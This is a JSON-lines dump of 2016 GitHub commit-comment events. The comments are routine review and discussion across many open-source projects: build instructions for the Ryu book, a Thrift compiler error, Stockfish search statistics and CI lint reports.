{"id":"4547428123","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979995,"position":8,"line":11,"path":"README.md","commit_id":"c88bd16f8637ba00e5f0350d3d0e533310586916","created_at":"2016-09-12T05:36:23Z","updated_at":"2016-09-12T05:36:23Z","body":"手順が英語版の作成例である旨およびビルドによって作成されるファイル一覧を追記します。\r\nまた、手順には仮想環境の構築手順も追記します。"}},"created_at":"2016-09-12T05:36:23Z"}
{"id":"4547430571","type":"CommitCommentEvent","actor":{"login":"Wijaxu"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":18979999,"position":null,"line":null,"path":null,"commit_id":"332ee934c094e1e1ab1ea01c82e33ab0bfbd5684","created_at":"2016-09-12T05:37:29Z","updated_at":"2016-09-12T05:37:29Z","body":"I'm doing a dedicated mode for SP, soon.."}},"created_at":"2016-09-12T05:37:29Z"}
{"id":"4547433183","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18980001,"position":8,"line":11,"path":"README.md","commit_id":"c88bd16f8637ba00e5f0350d3d0e533310586916","created_at":"2016-09-12T05:38:43Z","updated_at":"2016-09-12T05:38:43Z","body":"ビルドするための依存関係とかもありますし、下記のようは記載はいかがでしょうか？\r\n\r\n<pre>\r\nBefore building the Ryu-Book for each language,\r\nplease set up the building environment as follow.\r\n\r\nUbuntu 16.04 LTS:\r\n\r\n```\r\n$ sudo apt-get update\r\n$ sudo apt-get -y install inkscape texlive-latex-recommended texlive-latex-extra texlive-fonts-recommended\r\n# It is highly recommended to use a virtualenv.\r\n$ sudo pip install virtualenv\r\n$ virtualenv venv\r\n$ source venv/bin/activate\r\n(venv) $ pip install .\r\n(venv) $ ./build.sh en\r\n```\r\n</pre>"}},"created_at":"2016-09-12T05:38:43Z"}
{"id":"4547433214","type":"CommitCommentEvent","actor":{"login":"felixbarny"},"repo":{"name":"p6spy/p6spy"},"payload":{"comment":{"id":18980002,"position":null,"line":null,"path":null,"commit_id":"8184bd6e6739e37850f5f1242390b586a25009f5","created_at":"2016-09-12T05:38:44Z","updated_at":"2016-09-12T05:38:44Z","body":"This causes eager initialization of p6spy which was something I've tried to avoid. Could the initialization be deferred to the findPassthrou method? What is actually failing? Is it possible to recreate the situation in an unit test?"}},"created_at":"2016-09-12T05:38:44Z"}
{"id":"4547433933","type":"CommitCommentEvent","actor":{"login":"Eclair"},"repo":{"name":"OfficeDev/office-ui-fabric-ios"},"payload":{"comment":{"id":18980004,"position":56,"line":120,"path":"OfficeUIFabricDemo/OfficeUIFabricDemo/DemoControllers/Colors/ColorsDataSource.swift","commit_id":"16c58231f606aa0f4a798592048774d2ccfb2e0b","created_at":"2016-09-12T05:39:04Z","updated_at":"2016-09-12T05:39:04Z","body":"According to new swift code-style, should it be also '.register(nib: ..., forHeaderFooterViewReuseIdentifier: ...)' ?"}},"created_at":"2016-09-12T05:39:04Z"}
{"id":"4547438272","type":"CommitCommentEvent","actor":{"login":"happy6989"},"repo":{"name":"happy6989/github-example"},"payload":{"comment":{"id":18980008,"position":null,"line":null,"path":null,"commit_id":"1e2af024fe577e997d2bf7a38e3f190f4991b884","created_at":"2016-09-12T05:41:04Z","updated_at":"2016-09-12T05:41:04Z","body":"연습"}},"created_at":"2016-09-12T05:41:04Z"}
{"id":"4547438609","type":"CommitCommentEvent","actor":{"login":"SE2Dev"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":18980010,"position":null,"line":null,"path":null,"commit_id":"332ee934c094e1e1ab1ea01c82e33ab0bfbd5684","created_at":"2016-09-12T05:41:13Z","updated_at":"2016-09-12T05:41:13Z","body":"Like a dedicated server mode for SP?"}},"created_at":"2016-09-12T05:41:13Z"}
{"id":"4547439355","type":"CommitCommentEvent","actor":{"login":"GuoguangLan"},"repo":{"name":"apache/thrift"},"payload":{"comment":{"id":18980012,"position":null,"line":null,"path":null,"commit_id":"8252577ec9da25f027b9edfa6876f9d9a0094566","created_at":"2016-09-12T05:41:24Z","updated_at":"2016-09-12T05:41:24Z","body":"when Both __Clang__ and __GNUC__ are not define , there is an error!\r\n`compile:  CC -DHAVE_CONFIG_H -I. -I../.. -I../../lib/cpp/src/thrift -I/CBB_3rdTools/server/OpenSource/src/thrift/thrift-0.9.2/boost_1_57_0//include -I./src -D_POSIX_PTHREAD_SEMANTICS -D_SUN_ -DSUN -I/CBB_3rdTools/server/OpenSource/src/thrift/thrift-0.9.2/openssl/include -I/CBB_3rdTools/server/OpenSource/src/thrift/thrift-0.9.2/boost_1_57_0/include/boost/tr1 -Wextra -pedantic -g -c src/thrift/transport/TFileTransport.cpp  -KPIC -DPIC -o src/thrift/transport/.libs/TFileTransport.o\r\nCC: Warning: Option -Wextra passed to ld, if ld is invoked, ignored otherwise\r\nCC: Warning: Option -pedantic passed to ld, if ld is invoked, ignored otherwise\r\n\"./src/thrift/cxxfunctional.h\", line 124: Error: stdcxx is not a member of apache::thrift.`"}},"created_at":"2016-09-12T05:41:24Z"}
{"id":"4547440451","type":"CommitCommentEvent","actor":{"login":"Wijaxu"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":18980013,"position":null,"line":null,"path":null,"commit_id":"332ee934c094e1e1ab1ea01c82e33ab0bfbd5684","created_at":"2016-09-12T05:41:52Z","updated_at":"2016-09-12T05:41:52Z","body":"yes"}},"created_at":"2016-09-12T05:41:52Z"}
{"id":"4547441527","type":"CommitCommentEvent","actor":{"login":"jbachelor"},"repo":{"name":"jbachelor/XamarinDataBindingDemo"},"payload":{"comment":{"id":18980014,"position":1,"line":11,"path":"DataBinding/View/MainPage.xaml.cs","commit_id":"4a528395fb1228b2f23b9e6280b83b15950572b0","created_at":"2016-09-12T05:42:24Z","updated_at":"2016-09-12T05:42:24Z","body":"Code-behind getting leaner and meaner as we move to MVVM. Sweet happy testable goodness!"}},"created_at":"2016-09-12T05:42:24Z"}
{"id":"4547443439","type":"CommitCommentEvent","actor":{"login":"joealexp"},"repo":{"name":"joealexp/wedding"},"payload":{"comment":{"id":18980015,"position":null,"line":null,"path":null,"commit_id":"270ab437688c348c654f78365de3c210aeb6bf89","created_at":"2016-09-12T05:43:17Z","updated_at":"2016-09-12T05:43:17Z","body":"planns for wedding"}},"created_at":"2016-09-12T05:43:17Z"}
{"id":"4547444348","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18980017,"position":37,"line":37,"path":"issue11-2/edit.php","commit_id":"10fdec486f4b95dcd29e6f964b19e8780e95deeb","created_at":"2016-09-12T05:43:42Z","updated_at":"2016-09-12T05:43:42Z","body":"今ここに表示される名前は、`issue11-2/result.php` でどのコメントの「編集する」ボタンを押したとしてもtopicsテーブルの最新のコメントのnameが表示されてしまっているかと思います。\r\n\r\nどのようにしたいかというと、\r\n「編集する」ボタンを押したコメントのnameを表示したいですね。\r\nそのためにはデータベースで検索する時に、\r\n- 「編集する」ボタンを押したコメント(1件)を検索しなくてはいけません。\r\n\r\nヒントは、\r\n\r\nhttps://github.com/hdfukuoka1985/phptrainning/issues/15#issue-175953864\r\n\r\nの②の画像のURL部分です。\r\n\r\nまずはヒント少なめで、詰まりそうであれば再度連絡くださいませ。"}},"created_at":"2016-09-12T05:43:42Z"}
{"id":"4547445732","type":"CommitCommentEvent","actor":{"login":"thejase"},"repo":{"name":"damaestro/thumbor"},"payload":{"comment":{"id":18980018,"position":null,"line":null,"path":null,"commit_id":"f6cba5ed210e77dce57cd22b32ff074acc7a9dee","created_at":"2016-09-12T05:44:19Z","updated_at":"2016-09-12T05:44:19Z","body":"Confirmed, this has dropped memory usage for me by almost 60%."}},"created_at":"2016-09-12T05:44:19Z"}
{"id":"4547447353","type":"CommitCommentEvent","actor":{"login":"alexandru"},"repo":{"name":"monixio/monix"},"payload":{"comment":{"id":18980020,"position":null,"line":null,"path":null,"commit_id":"5298c5ef147fdbe394ac8550d2e24af06eb630b9","created_at":"2016-09-12T05:45:09Z","updated_at":"2016-09-12T05:45:09Z","body":"I'm struggling with how to describe it :-) Will probably change it back :-P"}},"created_at":"2016-09-12T05:45:09Z"}
{"id":"4547449494","type":"CommitCommentEvent","actor":{"login":"covyta"},"repo":{"name":"covyta/savy"},"payload":{"comment":{"id":18980023,"position":null,"line":null,"path":null,"commit_id":"95dd733ad38355da99bc5bfea54beff1fec85fe5","created_at":"2016-09-12T05:46:05Z","updated_at":"2016-09-12T05:46:05Z","body":"Very nice"}},"created_at":"2016-09-12T05:46:05Z"}
{"id":"4547451274","type":"CommitCommentEvent","actor":{"login":"bagder"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18980025,"position":47,"line":47,"path":"docs/CODE_STYLE.md","commit_id":"303bf719ff810114e335e7d562b11f9fc3c3ff57","created_at":"2016-09-12T05:46:52Z","updated_at":"2016-09-12T05:46:52Z","body":"It should, the current checksrc script warns with `warning: Longer than 79 columns`"}},"created_at":"2016-09-12T05:46:52Z"}
{"id":"4547453387","type":"CommitCommentEvent","actor":{"login":"Eclair"},"repo":{"name":"OfficeDev/office-ui-fabric-ios"},"payload":{"comment":{"id":18980026,"position":null,"line":null,"path":null,"commit_id":"16c58231f606aa0f4a798592048774d2ccfb2e0b","created_at":"2016-09-12T05:47:48Z","updated_at":"2016-09-12T05:47:48Z","body":"Overall I like the changes except a few minor configuration tweaks (just need to double check them before deploying). Really nice job! \r\nMaybe we can even go little deeper and rename functions signatures to match the new swift code-style, but its probably low priority thing for now."}},"created_at":"2016-09-12T05:47:48Z"}
{"id":"4547454818","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"esby/RawTherapee"},"payload":{"comment":{"id":18980027,"position":8,"line":128,"path":"rtgui/guiutils.h","commit_id":"fd6b3b780591ee36f84fea4dec04d315f0673fe7","created_at":"2016-09-12T05:48:24Z","updated_at":"2016-09-12T05:48:24Z","body":"> is there a way to store a generic class and cast it if needed without having to define this kind of class hack ?\r\n\r\nMaybe a double dispatch with the [visitor pattern](https://en.wikipedia.org/wiki/Visitor_pattern)? Don't know, if that fits the purpose you're after..."}},"created_at":"2016-09-12T05:48:24Z"}
{"id":"4547455611","type":"CommitCommentEvent","actor":{"login":"revolucas"},"repo":{"name":"OpenXRay/xray-16"},"payload":{"comment":{"id":18980028,"position":null,"line":null,"path":null,"commit_id":"32005e8e253ff084469ca19e405de2b2a35c4c90","created_at":"2016-09-12T05:48:46Z","updated_at":"2016-09-12T05:48:46Z","body":"OK done."}},"created_at":"2016-09-12T05:48:46Z"}
{"id":"4547457788","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18980032,"position":null,"line":null,"path":null,"commit_id":"8d85ce6ac988af8601bac8fe6a56fb75216f279c","created_at":"2016-09-12T05:49:47Z","updated_at":"2016-09-12T05:49:47Z","body":"It's funny, you are the second person in two days who tells me that the ALL_EVASION phase is never executed from qsearch (Marco said it too), but this is not true.\r\n\r\nTry this in master, line 1284 of search.cpp and run bench:\r\n````\r\ndbg_mean_of( pos.checkers() != 0 );\r\n````\r\n\r\nThe results is `Total 2100193 Mean 0.169259`, which proves that 17% of qsearch moves are check evasions.\r\n\r\nConversively, if you bind depth to d in the qsearch move picker constructor (`depth(d)`in line 84 of movepicker.cpp) and then insert the following line to line 172 of movepicker.cpp and run bench:\r\n````\r\n  dbg_mean_of( depth <= 0);\r\n````\r\n\r\nThe result is `Total 555964 Mean 0.604974, which proves that 60% of check evasion scoring are done in qsearch.\r\n"}},"created_at":"2016-09-12T05:49:47Z"}
{"id":"4547459232","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18980034,"position":8,"line":11,"path":"README.md","commit_id":"c88bd16f8637ba00e5f0350d3d0e533310586916","created_at":"2016-09-12T05:50:27Z","updated_at":"2016-09-12T05:50:27Z","body":"記載例まで挙げて頂きましてありがとうございます。\r\n上記に以下の文章を加えた形で修正致します。\r\n```\r\nThe following is an example the creation of the English version.\r\n```\r\n"}},"created_at":"2016-09-12T05:50:27Z"}
{"id":"4547460228","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"esby/RawTherapee"},"payload":{"comment":{"id":18980036,"position":8,"line":161,"path":"rtgui/toolpanel.cc","commit_id":"fd6b3b780591ee36f84fea4dec04d315f0673fe7","created_at":"2016-09-12T05:50:54Z","updated_at":"2016-09-12T05:50:54Z","body":"... because they are library calls you can't work around, I see."}},"created_at":"2016-09-12T05:50:54Z"}
{"id":"4547462626","type":"CommitCommentEvent","actor":{"login":"AaronZhouQian"},"repo":{"name":"AaronZhouQian/grep"},"payload":{"comment":{"id":18980043,"position":null,"line":null,"path":null,"commit_id":"9c0b548825a199defeb2f36d0ae44cd6abaff0f8","created_at":"2016-09-12T05:52:04Z","updated_at":"2016-09-12T05:52:04Z","body":"First stage of encapsulating global variables for grep threads."}},"created_at":"2016-09-12T05:52:04Z"}
{"id":"4547469183","type":"CommitCommentEvent","actor":{"login":"FortuneCooky"},"repo":{"name":"FortuneCooky/planets"},"payload":{"comment":{"id":18980060,"position":4,"line":5,"path":"pluto.txt","commit_id":"556635d89a6e30a89df4bafc619c181fe168e56d","created_at":"2016-09-12T05:55:00Z","updated_at":"2016-09-12T05:55:00Z","body":"What are you smoking?"}},"created_at":"2016-09-12T05:55:00Z"}
{"id":"4547470260","type":"CommitCommentEvent","actor":{"login":"FortuneCooky"},"repo":{"name":"FortuneCooky/planets"},"payload":{"comment":{"id":18980061,"position":2,"line":3,"path":"pluto.txt","commit_id":"556635d89a6e30a89df4bafc619c181fe168e56d","created_at":"2016-09-12T05:55:30Z","updated_at":"2016-09-12T05:55:30Z","body":"Should update this to specify green aliens."}},"created_at":"2016-09-12T05:55:30Z"}
{"id":"4547473101","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18980070,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T05:56:43Z","updated_at":"2016-09-12T05:56:43Z","body":"Please set bounds to (-3,1) and flip master with your version. \r\n\r\nMaster should be the new and your version the base "}},"created_at":"2016-09-12T05:56:43Z"}
{"id":"4547473527","type":"CommitCommentEvent","actor":{"login":"TecSeguridad"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":18980072,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-12T05:56:54Z","updated_at":"2016-09-12T05:56:54Z","body":"Thank you very much, i just find that instrcutions! im doing that right now. I spect to fix the #822 issue. I need to make it work tonight, Is 3 am here :-)"}},"created_at":"2016-09-12T05:56:54Z"}
{"id":"4547476473","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18980082,"position":null,"line":null,"path":null,"commit_id":"64887368193eec5c8ac951a746899a6334e509b8","created_at":"2016-09-12T05:58:11Z","updated_at":"2016-09-12T05:58:11Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/43/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:182:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:230:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:311:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-12T05:58:11Z"}
{"id":"4547477281","type":"CommitCommentEvent","actor":{"login":"darkv"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":18980084,"position":null,"line":null,"path":null,"commit_id":"6b36e266c6dc47ccb2746a649f9ac13123673d09","created_at":"2016-09-12T05:58:28Z","updated_at":"2016-09-12T05:58:28Z","body":"Hi Saify,\r\n\r\nfor version information have a look at the wiki https://github.com/wocommunity/wonder/wiki\r\n\r\nIf your code is picking up the original WOTable class I would check your class path ordering as it really should use the Wonder one. ERExtensions should come before the WO frameworks."}},"created_at":"2016-09-12T05:58:28Z"}
{"id":"4547487310","type":"CommitCommentEvent","actor":{"login":"GuoguangLan"},"repo":{"name":"apache/thrift"},"payload":{"comment":{"id":18980146,"position":null,"line":null,"path":null,"commit_id":"8252577ec9da25f027b9edfa6876f9d9a0094566","created_at":"2016-09-12T06:02:41Z","updated_at":"2016-09-12T06:02:41Z","body":"when i modify the code like this:\r\n`#ifdef __clang__\r\n  /* Clang has two options, depending on standard library:\r\n   * - no -stdlib or -stdlib=libstdc++ set; uses GNU libstdc++.\r\n   *    <tr1/functional>\r\n   * - -stdlib=libc++; uses LLVM libc++.\r\n   *    <functional>, no 'std::tr1'.\r\n   *\r\n   * The compiler itself doesn't define anything differently\r\n   * depending on the value of -stdlib, but the library headers\r\n   * will set different preprocessor options. In order to check,\r\n   * though, we have to pull in some library header.\r\n   */\r\n  #include <utility>\r\n\r\n  /* With LLVM libc++, utility pulls in __config, which sets\r\n     _LIBCPP_VERSION. */\r\n  #if defined(_LIBCPP_VERSION)\r\n    #define _THRIFT_USING_CLANG_LIBCXX 1\r\n\r\n  /* With GNU libstdc++, utility pulls in bits/c++config.h,\r\n     which sets __GLIBCXX__. */\r\n  #elif defined(__GLIBCXX__)\r\n    #define _THRIFT_USING_GNU_LIBSTDCXX 1\r\n\r\n  /* No idea. */\r\n  #else\r\n    #error Unable to detect which C++ standard library is in use.\r\n  #endif\r\n#elif __GNUC__\r\n  #define _THRIFT_USING_GNU_LIBSTDCXX 1\r\n/* No idea. */\r\n#else\r\n  #error Unable to detect which C++ standard library is in use. Both __Clang__ and __GNUC__ are not definde!\r\n#endif`\r\n\r\n\"./src/thrift/cxxfunctional.h\", line 71: Error: #error Unable to detect which C++ standard library is in use. Both __Clang__ and __GNUC__ are not definde!."}},"created_at":"2016-09-12T06:02:41Z"}
{"id":"4547489527","type":"CommitCommentEvent","actor":{"login":"sunminghai"},"repo":{"name":"coolnameismy/demo"},"payload":{"comment":{"id":18980149,"position":133,"line":133,"path":"MasonryDemo/MasonryDemo/MasonryDemo.xcodeproj/project.pbxproj","commit_id":"641d8fb97e3ebcb587a1368eede2c0408eb4fd61","created_at":"2016-09-12T06:03:31Z","updated_at":"2016-09-12T06:03:31Z","body":"及还款即可"}},"created_at":"2016-09-12T06:03:31Z"}
{"id":"4547490937","type":"CommitCommentEvent","actor":{"login":"nomadtungus"},"repo":{"name":"nomadtungus/hello-world"},"payload":{"comment":{"id":18980154,"position":null,"line":null,"path":null,"commit_id":"5cadaa28f89e64437090457e8dc6c78a43f5df11","created_at":"2016-09-12T06:04:07Z","updated_at":"2016-09-12T06:04:07Z","body":"this is the second"}},"created_at":"2016-09-12T06:04:07Z"}
{"id":"4547493883","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18980163,"position":null,"line":null,"path":null,"commit_id":"cec32071034de73cdd2562852f32f6f0ab9bd846","created_at":"2016-09-12T06:05:18Z","updated_at":"2016-09-12T06:05:18Z","body":"Because this project was originally called PS3 Media Server so there's a lot of PS3-specific code :) "}},"created_at":"2016-09-12T06:05:18Z"}
{"id":"4547494694","type":"CommitCommentEvent","actor":{"login":"covyta"},"repo":{"name":"vsouza/awesome-ios"},"payload":{"comment":{"id":18980166,"position":8,"line":11,"path":".travis.yml","commit_id":"526172070b1e748610abca52a91bf937e3c8f8de","created_at":"2016-09-12T06:05:36Z","updated_at":"2016-09-12T06:05:36Z","body":"Good"}},"created_at":"2016-09-12T06:05:36Z"}
{"id":"4547505692","type":"CommitCommentEvent","actor":{"login":"Wijaxu"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":18980185,"position":null,"line":null,"path":null,"commit_id":"332ee934c094e1e1ab1ea01c82e33ab0bfbd5684","created_at":"2016-09-12T06:10:13Z","updated_at":"2016-09-12T06:10:13Z","body":"@Nukem9 @SE2Dev I want to help you with LinkerMod .__."}},"created_at":"2016-09-12T06:10:13Z"}
{"id":"4547514378","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Civcraft/BetterShards"},"payload":{"comment":{"id":18980199,"position":null,"line":null,"path":null,"commit_id":"00e2a0184066a034ca0ab79c2b80cba9c0911d20","created_at":"2016-09-12T06:13:29Z","updated_at":"2016-09-12T06:13:29Z","body":"Should maybe make this a config parameter, but we want to kill civconfigs anyway, so I'm not gonna do that right now."}},"created_at":"2016-09-12T06:13:29Z"}
{"id":"4547514480","type":"CommitCommentEvent","actor":{"login":"kryi"},"repo":{"name":"kryi/CWS_Tag1"},"payload":{"comment":{"id":18980201,"position":1,"line":1,"path":".classpath","commit_id":"a134bf68514cdb1b15611f6726c5ceb126e74f50","created_at":"2016-09-12T06:13:31Z","updated_at":"2016-09-12T06:13:31Z","body":"Ok\r\n"}},"created_at":"2016-09-12T06:13:31Z"}
{"id":"4547516623","type":"CommitCommentEvent","actor":{"login":"nitin1438"},"repo":{"name":"nitrogen-os-devices/android_device_lge_mako"},"payload":{"comment":{"id":18980208,"position":null,"line":null,"path":null,"commit_id":"124a0e8fd80bfc57fe023f66d0d55bb7e719ee6b","created_at":"2016-09-12T06:14:18Z","updated_at":"2016-09-12T06:14:18Z","body":"done...\n\nNitin\n\nOn 11 September 2016 at 19:38, Valeriy <notifications@github.com> wrote:\n\n> <!-- enable doze powersaving mode -->\n> <bool name=\"config_enableAutoPowerModes\">true</bool>\n>\n> This should be a separate commit\n> Delete this strings, save file, and:\n>\n> git add -A\n> git commit --amend\n> git push -f\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nitrogen-os-devices/android_device_lge_mako/commit/124a0e8fd80bfc57fe023f66d0d55bb7e719ee6b#commitcomment-18977076>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKTDo_XIyOc5jJuhVTBC191WyIDgdn3Yks5qpAtxgaJpZM4J6A7T>\n> .\n>\n"}},"created_at":"2016-09-12T06:14:18Z"}
{"id":"4547516902","type":"CommitCommentEvent","actor":{"login":"weng-pang"},"repo":{"name":"jewelyang10/UltimateInhaler"},"payload":{"comment":{"id":18980209,"position":5,"line":10,"path":"app/build.gradle","commit_id":"f4f025d7fc5cbd0efd2a92e148d86ca45ad8d0c5","created_at":"2016-09-12T06:14:25Z","updated_at":"2016-09-12T06:14:25Z","body":"Please keep the min SDK version unchange."}},"created_at":"2016-09-12T06:14:25Z"}
{"id":"4547519158","type":"CommitCommentEvent","actor":{"login":"weng-pang"},"repo":{"name":"weng-pang/AzureDeploymentTest"},"payload":{"comment":{"id":18980215,"position":11,"line":9,"path":"index.php","commit_id":"f96dd97ec2f3101f91bbff8229b7086832dde84f","created_at":"2016-09-12T06:15:18Z","updated_at":"2016-09-12T06:15:18Z","body":"The rest remain unchanged"}},"created_at":"2016-09-12T06:15:18Z"}
{"id":"4547520798","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18980217,"position":null,"line":null,"path":null,"commit_id":"9f013bc8d02d54b692ab4233c917406e6b0db666","created_at":"2016-09-12T06:15:57Z","updated_at":"2016-09-12T06:15:57Z","body":"Related to: backdrop/backdrop-issues#2153 "}},"created_at":"2016-09-12T06:15:57Z"}
{"id":"4547522744","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18980222,"position":null,"line":null,"path":null,"commit_id":"17246d64406bf61f6f27dfbc6712f7bf92e30194","created_at":"2016-09-12T06:16:42Z","updated_at":"2016-09-12T06:16:42Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/44/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:182:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:230:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:311:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-12T06:16:42Z"}
{"id":"4547523740","type":"CommitCommentEvent","actor":{"login":"GrigoriLomonosov"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18980223,"position":null,"line":null,"path":null,"commit_id":"4a596d3e90ff44aba8fd792608243e3b50be0b39","created_at":"2016-09-12T06:17:05Z","updated_at":"2016-09-12T06:17:05Z","body":"Waarom werk je juist met isEmpty? Dan moet je alles nog eens controleren op lege vakjes. Kan je niet gewoon met de return values werken van de functies (0== succes/toevoeging). Dan heb je geen extra methode nodig en minder berekeningen. Nu zal je na iedere stap in de lus nog eens alles overlopen."}},"created_at":"2016-09-12T06:17:05Z"}
{"id":"4547525831","type":"CommitCommentEvent","actor":{"login":"mayuranchalia"},"repo":{"name":"hariksetra/ISKCON-Preaching-Assistant"},"payload":{"comment":{"id":18980227,"position":5,"line":6,"path":"project/PreachingAssistant/src/main/resources/application.properties","commit_id":"731cb8ee0af72ca88f878be988ac45701c36fdd3","created_at":"2016-09-12T06:17:53Z","updated_at":"2016-09-12T06:17:53Z","body":"Sure that can be done.."}},"created_at":"2016-09-12T06:17:53Z"}
{"id":"4547525863","type":"CommitCommentEvent","actor":{"login":"PrimaryFeather"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":18980228,"position":null,"line":null,"path":null,"commit_id":"7e20a4930db0383ac555b99cdf45c997afb07bdb","created_at":"2016-09-12T06:17:53Z","updated_at":"2016-09-12T06:17:53Z","body":"> Why you do not use const, as i know it is more effecient memory usage?\r\n\r\nYou're right, I could use `const` here — that would be a good practice. However, it wouldn't change anything memory- or performance-wise. See: [The Const Keyword](http://jacksondunstan.com/articles/889) \r\n\r\n> And why you referencing the same property twice?\r\n\r\nWhich property are you talking about?"}},"created_at":"2016-09-12T06:17:53Z"}
{"id":"4547531093","type":"CommitCommentEvent","actor":{"login":"marksev1"},"repo":{"name":"marksev1/mycroft-core"},"payload":{"comment":{"id":18980236,"position":null,"line":null,"path":null,"commit_id":"21802f3a68d6406ad6ace73d88d29d7dcb3bd24c","created_at":"2016-09-12T06:19:50Z","updated_at":"2016-09-12T06:19:50Z","body":"Sem že naredil to prej :). Mi dela vse že. samo prek terminala mi ne dela."}},"created_at":"2016-09-12T06:19:50Z"}
{"id":"4547538704","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":18980253,"position":25,"line":534,"path":"rtengine/iccstore.cc","commit_id":"ee4749f27197057b97d31056960f76af26bc5357","created_at":"2016-09-12T06:22:35Z","updated_at":"2016-09-12T06:22:35Z","body":"@Hombre57 This is called from [here](https://github.com/Beep6581/RawTherapee/blob/softproofing/rtengine/simpleprocess.cc#L1173) unlocked (at least I can't find a reference to `lcmsMutex`). Does that matter?"}},"created_at":"2016-09-12T06:22:35Z"}
{"id":"4547541968","type":"CommitCommentEvent","actor":{"login":"draknyte1"},"repo":{"name":"draknyte1/GTplusplus"},"payload":{"comment":{"id":18980258,"position":null,"line":null,"path":null,"commit_id":"945bb70ec777124bb73b4289f03dbc522007fdbc","created_at":"2016-09-12T06:23:48Z","updated_at":"2016-09-12T06:23:48Z","body":"$ Fixed incorrect cell recipes, again, for the final time."}},"created_at":"2016-09-12T06:23:48Z"}
{"id":"4547544947","type":"CommitCommentEvent","actor":{"login":"GrigoriLomonosov"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18980265,"position":null,"line":null,"path":null,"commit_id":"03fcdb0e259be1558de868e7f8c473716d5aa199","created_at":"2016-09-12T06:24:55Z","updated_at":"2016-09-12T06:24:55Z","body":"Waarom doe je dat enkel met de arrays in de lus en niet met de arrays van arrays en de andere velden? Is het niet beter foutafhandeling te  doen in de constructor( init_puzzle) gelijk in SOI?"}},"created_at":"2016-09-12T06:24:55Z"}
{"id":"4547564537","type":"CommitCommentEvent","actor":{"login":"amiryal"},"repo":{"name":"hashicorp/vault-rails"},"payload":{"comment":{"id":18980307,"position":6,"line":65,"path":"lib/vault/rails.rb","commit_id":"07399786d9fc09c295e93af0df87023eaf26c827","created_at":"2016-09-12T06:31:59Z","updated_at":"2016-09-12T06:31:59Z","body":"The fact that a string is empty may itself be sensitive information. What was the reason behind choosing `.blank?` over `.nil?`?"}},"created_at":"2016-09-12T06:31:59Z"}
{"id":"4547565776","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18980309,"position":null,"line":null,"path":null,"commit_id":"fda2b63ad8e866432f6554e5be104f9297726132","created_at":"2016-09-12T06:32:26Z","updated_at":"2016-09-12T06:32:26Z","body":"More info here: \r\nhttp://docs.doctrine-project.org/projects/doctrine-orm/en/latest/reference/batch-processing.html"}},"created_at":"2016-09-12T06:32:26Z"}
